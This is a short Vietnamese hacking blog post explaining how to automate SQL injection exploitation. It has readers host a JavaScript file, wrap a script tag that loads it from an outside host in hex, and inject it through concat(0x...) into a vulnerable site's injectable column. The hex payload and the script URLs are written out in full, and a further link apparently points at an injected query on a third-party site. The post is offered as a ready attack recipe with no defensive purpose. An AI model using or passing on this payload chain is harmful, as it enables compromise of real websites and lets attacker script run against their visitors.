Trang

Auto Khai Thác SQL Injection (Update)

I- JS Khai thác sqli







Download Code:
-úp file js lên hosting.
-sử link js trong sript sau:
Quote:
<script src='http://link.com/sqli.js'></script>
VD:

Quote:
<script src='http://thptquangha.com/sqli.js'></script>
-sau đó convert đoạn sript trên sang hex.
- ta được :
Quote:
3c736372697074207372633d27687474703a2f2f7468707471 75616e6768612e636f6d2f73716c692e6a73273e3c2f736372 6970743e

- dùng nó trong thẻ sau:


concat((0x mã hex))vnhack

VD:
Quote:
concat((0x3c736372697074207372633d27687474703a2f2f 746870747175616e6768612e636f6d2f73716c692e6a73273e 3c2f7363726970743e))vnhack
- đã xong. giờ ví dụ bạn đang khai thác 1 site bị sqli.
đã tìm được số lỗi. bạn chỉ việc chèn đoạn trên vào 1 trong các số lỗi đó. tiếp theo bạn tự tìm hiểu .
( cái này không hẳn site nào cũng khai thác được ).

-VD với js trên :
=======================================


II- Hoặc 1 js khác : cái này dễ nhìn hơn cái trên






download:
Quote:
http://kemlam.com/?content=detail&pr...,9,10,11,12,13

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

1 nhận xét:

Copyright © Dương-UG Blog's - Nguyễn Bình Dương